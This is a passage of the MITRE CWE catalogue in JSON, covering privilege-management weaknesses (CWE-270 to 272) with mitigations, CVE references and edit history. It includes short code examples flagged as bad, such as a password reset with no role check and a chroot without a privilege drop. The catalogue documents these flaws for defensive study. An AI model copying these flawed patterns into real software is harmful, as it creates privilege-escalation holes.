system."},{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1555","Description":"Terminal privileges are not reset when a user logs out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1555"},{"Reference":"CVE-2001-1514","Description":"Does not properly pass security context to child processes in certain cases, allows privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1514"},{"Reference":"CVE-2001-0128","Description":"Does not properly compute roles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0128"},{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"},{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"},{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Management Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"58"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Dropping Privileges Permanently&#34;, Page 479"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"CWE Team","Modification_Date":"2008-09-08","Modification_Comment":"Moved this entry higher up in the Research view."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Privilege Management Error","attr":{"@_Date":"2008-09-09"}},{"#text":"Insecure Privilege Management","attr":{"@_Date":"2009-05-27"}}]}},"270":{"attr":{"@_ID":"270","@_Name":"Privilege Context Switching Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1688","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688"},{"Reference":"CVE-2003-1026","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1026"},{"Reference":"CVE-2002-1770","Description":"Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1770"},{"Reference":"CVE-2005-2263","Description":"Run callback in different security context after it has been changed from untrusted to trusted. * note that \\"context switch before actions are completed\\" is one type of problem that happens frequently, espec. in browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2263"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Context Switching Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"236"}},{"attr":{"@_CAPEC_ID":"30"}},{"attr":{"@_CAPEC_ID":"35"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Running with Least Privilege&#34; Page 207"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Notes":{"Note":{"#text":"This concept needs more study.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"271":{"attr":{"@_ID":"271","@_Name":"Privilege Dropping / Lowering Errors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not drop privileges before passing control of a resource to an actor that does not have those privileges.","Extended_Description":"In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1213","Description":"Program does not drop privileges after acquiring the raw socket.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1213"},{"Reference":"CVE-2001-0559","Description":"Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559"},{"Reference":"CVE-2001-0787","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0787"},{"Reference":"CVE-2002-0080","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"},{"Reference":"CVE-2001-1029","Description":"Does not drop privileges before determining access to certain files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1029"},{"Reference":"CVE-1999-0813","Description":"Finger daemon does not drop privileges when executing programs on behalf of the user being fingered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0813"},{"Reference":"CVE-1999-1326","Description":"FTP server does not drop privileges if a connection is aborted during file transfer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1326"},{"Reference":"CVE-2000-0172","Description":"Program only uses seteuid to drop privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0172"},{"Reference":"CVE-2004-2504","Description":"Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2504"},{"Reference":"CVE-2004-0213","Description":"Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0806","Description":"Setuid program does not drop privileges before executing program specified in an environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0806"},{"Reference":"CVE-2004-0828","Description":"Setuid program does not drop privileges before processing file specified on command line.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0828"},{"Reference":"CVE-2004-2070","Description":"Service on Windows does not drop privileges before using \\"view file\\" option, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2070"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Dropping / Lowering Errors"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Dropping Privileges Permanently&#34;, Page 479"}}]},"Notes":{"Note":{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"272":{"attr":{"@_ID":"272","@_Name":"Least Privilege Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker\'s original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"setuid(0);setuid(old_uid);","xhtml:br":["","","",""],"xhtml:i":["// Do some important stuff","// Do some non privileged stuff."]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Least Privilege Violation"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to drop privileges when reasonable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS02-C","Entry_Name":"Follow the principle of least privilege"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP36","Entry_Name":"Privilege"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":["If system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically.","When a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation has completed, the program should drop root privilege and return to the privilege level of the invoking user."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, 